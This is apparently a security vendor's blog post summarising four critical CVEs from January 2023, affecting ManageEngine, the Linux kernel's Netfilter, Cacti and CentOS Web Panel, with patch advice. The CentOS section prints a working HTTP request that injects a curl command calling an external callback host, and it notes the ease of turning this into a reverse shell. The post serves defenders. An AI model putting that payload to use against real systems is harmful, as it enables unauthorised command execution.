NopSec.com uses cookies to make interactions with the Company’s Websites easy and meaningful. When you visit one of the Company’s Websites, NopSec.com’s servers send a cookie to your computer. Standing alone, cookies do not personally identify you; they merely recognize your Web browser. Unless you choose to identify yourself to NopSec.com, either by responding to a promotional offer, opening an account, or filling out a Web form (such as a “Contact Us” or a “Free Trial” Web form), you remain anonymous to the Company. Please go to our privacy statement for details.

Acknowledge

Top Trending CVEs of January 2023

Command Line Code Image

Happy New Year! In this month’s trending CVEs ManageEngine takes the top spot with yet another unauthenticated remote command execution (RCE) vulnerability that impacts a wide range of their products. A researcher poking around the Linux kernel has identified a buffer overflow in the Netfilter subsystem, which is used for various low level network operations. Cacti, a popular open-source network monitoring framework, was hit with an unauthenticated remote command execution vulnerability. Finally, we cover an unauthenticated RCE vulnerability identified in the Centos Web Panel, which has roughly 35k deployments. In a surprising twist all of these vulnerabilities have public exploit code. Roll up your sleeves and drop to a command line as we cover some of January’s trendiest vulnerabilities.

 

1. ManageEngine Unauthenticated RCE CVE-2022-47966

Researchers have identified a RCE vulnerability in a wide range of ManageEngine products, however only for deployments with SAML authentication enabled. The issue is related to the presence of an outdated Apache Santuario dependency, which is used for SAML validation. The vulnerability arises due to the order in which SAML data is verified. SAML assertions are sent by the client (browser) as XML objects and contain various elements that need to be validated by the server. The Apache Santuario library used to perform this validation on vulnerable deployments checks the “References” element first and then checks cryptographical integrity to ensure the SAML assertion was not tampered with. The SAML verification order is at the core of the vulnerability. SAML Reference elements generally contain digest values, but can also contain “Transform” elements that describe how to modify an element. The “Transform” elements achieve this modification via XSL transformations (XSLT). Within ManageEngine an XSLT is capable of executing arbitrary Java code. Bringing this all together it’s possible for an attacker to craft a malicious SAML assertion that contains “Transform” elements that result in arbitrary code execution. The researcher who found this bug did so by analyzing the changes between ManageEngine updates, the most significant of which was the update to libxmlsec from v1.4.1 to v2.2.3. If you check the release notes for libxmlsec v1.4.2, you’ll notice that Reference element verification is performed last vs first, thus eliminating the ability of an attacker to inject malformed values into a Transform element. Public exploit code and vulnerability scanner have been released. Patch now or disable SAML authentication until you can.

Severity Complexity CVSS Score
Critical Low 9.8

 

Systems Impacted:

Product Name Impacted Version(s) Fixed Version(s) Released On
Access Manager Plus* 4307 and below 4308 7/11/2022
Active Directory 360** 4309 and below 4310 28/10/2022
ADAudit Plus** 7080 and below 7081 28/10/2022
ADManager Plus** 7161 and below 7162 28/10/2022
ADSelfService Plus** 6210 and below 6211 28/10/2022
Analytics Plus* 5140 and below 5150 7/11/2022
Application Control Plus* 10.1.2220.17 and below 10.1.2220.18 28/10/2022
Asset Explorer** 6982 and below 6983 27/10/2022
Browser Security Plus* 11.1.2238.5 and below 11.1.2238.6 28/10/2022
Device Control Plus* 10.1.2220.17 and below 10.1.2220.18 28/10/2022
Endpoint Central* 10.1.2228.10 and below 10.1.2228.11 28/10/2022
Endpoint Central MSP* 10.1.2228.10 and below 10.1.2228.11 28/10/2022
Endpoint DLP* 10.1.2137.5 and below 10.1.2137.6 28/10/2022
Key Manager Plus* 6400 and below 6401 27/10/2022
OS Deployer* 1.1.2243.0 and below 1.1.2243.1 28/10/2022
PAM 360* 5712 and below 5713 7/11/2022
Password Manager Pro* 12123 and below 12124 7/11/2022
Patch Manager Plus* 10.1.2220.17 and below 10.1.2220.18 28/10/2022
Remote Access Plus* 10.1.2228.10 and below 10.1.2228.11 28/10/2022
Remote Monitoring and Management (RMM)* 10.1.40 and below 10.1.41 29/10/2022
ServiceDesk Plus** 14003 and below 14004 27/10/2022
ServiceDesk Plus MSP** 13000 and below 13001 27/10/2022
SupportCenter Plus** 11017 to 11025 11026 28/10/2022
Vulnerability Manager Plus* 10.1.2220.17 and below 10.1.2220.18 28/10/2022

 

Read more

 

2. Linux Kernel Netfilter Buffer Overflow CVE-2023-0179

The Linux kernel 5.5 to 6.2 is prone to a buffer overflow in the Netfilter subsystem. The Netfilter subsystem is responsible for low level networking operations and is often used in a capacity similar to iptables. The buffer overflow present in the function nft_payload_copy_vlan results from an integer underflow, which is a weird concept to wrap your brain around. Effectively, a buffer bounds check passes as true, but a typo in the subsequently processed code permits an integer underflow on an unsigned value, which results in an unintended large buffer. The excessively large buffer is then copied via memcpy to the previously allocated buffer, which results in an out of bounds write aka a buffer overflow. Publicly available exploits demonstrate that memory addresses can be leaked from the attack. Additionally the researcher who published the advisory and patch provided evidence that this could be weaponized to achieve remote command execution resulting in privilege escalation. However, the proof-of-concept stopped short of a fully functional RCE payload. This vulnerability was only assigned a CVSS score of 4 based purely on information leakage, but it has the sneaky potential to introduce more risk than it would initially seem. I would bank on the eventual release of a weaponized payload capable of achieving remote command execution and privilege escalation. This vulnerability requires the ability to execute commands on the system, so direct unauthenticated remote exploitation is not possible.

Severity Complexity CVSS Score
Moderate Moderate 4

 

Systems/Applications Impacted: All Linux kernel versions from 5.5 to 6.2-rc3

Read more

 

3. Cacti Unauthenticated RCE CVE-2022-46169

Cacti is an open source network monitoring framework with roughly 35,000 deployments worldwide (according to the Cacti team), with thousands of those publicly accessible. Within Cacti the “remote_agent.php” script was found to be prone to an authentication bypass vulnerability that can be chained with another flaw to achieve RCE. Authentication bypass is possible due to the manner in which remote clients are authorized when accessing “remote_agent.php”. As part of the authorization process the client IP is captured. The “get_client_address” function inspects a number of different values to retrieve the IP address, some of which are HTTP headers that an attacker has full control over. By injecting the IP address of the Cacti server into, for example, an HTTP_X_FORWARDED header it’s possible to compel the server to perform a host name lookup. The resolved host name is then compared against a table of authorized hosts, which by default includes the Cacti web server. Once authorization is bypassed, attackers can inject arbitrary commands into the “poller_id” parameter, which under the correct conditions becomes the first parameter of a call to “proc_open” leading to RCE. This is a pretty cool vuln and very easy to exploit. Patch now!

Severity Complexity CVSS Score
Critical Low 9.8

 

Systems/Applications Impacted: Cacti version 1.2.22 and below

Read more

 

4. CentOS Web Panel 7 Unauthenticated RCE CVE-2022-44877

CentOS Web Panel, a Linux based web hosting management system, is prone to a trivial remote command execution vulnerability. It was determined that the “login/index.php” script fails to sufficiently sanitize input supplied to the “login” URL query parameter. Crafted requests that contain shell metacharacters injected into the vulnerable parameter results in the remote command execution. Exploitation is extremely trivial, as demonstrated below:

POST /login/index.php?login=$(curl${IFS}iwib5kpqofvnzn6f7dnwdmz86zcq0ho6.oastify.com) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login

When submitted, the above request will process the “curl” command injected into the “login” URL query parameter. It would be trivial to turn this into a reverse shell. Patch now!

Severity Complexity CVSS Score
High Low 9.8

 

Systems/Applications Impacted: CentOS Web Panel 7 version 0.9.8.1146 or earlier

Read More: 

 

To stay up to date on the latest trending and critical celebrity vulnerabilities, subscribe to NopSec’s newsletter. If you don’t like having to keep up with vulnerabilities like these yourself, let our Unified VRM platform do it for you. It takes into account new critical vulnerabilities as they emerge, ensuring your risks are prioritized accordingly in your unique environment. If you’d like to see what NopSec’s Unified VRM can do in action watch this on-demand product tour.

Schedule a Product Demo Today!

See how NopSec's security insights and cyber threat exposure management platform can organize your security chaos.